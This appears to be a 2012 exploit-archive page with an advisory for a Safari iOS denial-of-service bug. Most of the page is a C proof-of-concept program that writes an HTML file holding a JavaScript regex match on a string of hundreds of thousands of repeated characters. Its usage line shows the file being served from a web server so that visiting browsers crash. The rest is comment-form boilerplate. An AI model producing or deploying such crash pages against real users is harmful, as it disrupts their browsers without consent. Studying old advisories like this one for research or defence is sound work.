Safari iOS Denial Of Service

2012.06.09

Credit: Alberto Ortega

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

/*PoC for Safari crash discovered by
Alberto Ortega @a0rtega, alberto[@]pentbox[.]net
http://www.livehacking.com/category/vulnerability/apple-vulnerability/
This PoC written by
Larry W. Cashdollar http://vapid.dhs.org @lcashdol
This PoC creates an html file to be served out by a normal webserver.
It seems the browsers begin to crash when the output
size is 800000+.
usage: ./safari_crash 800000 /var/www/html/crash.html
*/
#include <stdio.h>
#include <stdlib.h>
int
main (int argc, char *argv[])
{
int x = 0;
FILE *fout;
char *payload = "<html>\n<head><title>Crash Safari PoC";
char *payload2="</title></head>\n<script
type=\"text/javascript\">\nvar s = \"PoC\";\ns.match(\"\0";
char *payload3 = "\");\n</script>\n</html>\0";
if (argc < 3)
{
printf
("Safari Crash PoC\nPlease supply buffer length and filename.\nEx
:%s 800000 crash.html\n",
argv[0]);
exit (0);
}
fout = fopen (argv[2], "w");
fprintf (fout, "%s", payload);
fprintf (fout, "Size : %s x A",argv[1]);
fprintf (fout,"%s",payload2);
while (x < atoi (argv[1]))
{
fprintf (fout, "A");
x++;
}
fprintf (fout, "%s", payload3);
fclose (fout);
return (0);
}

References:

http://www.livehacking.com/category/vulnerability/apple-vulnerability/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Safari iOS Denial Of Service

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.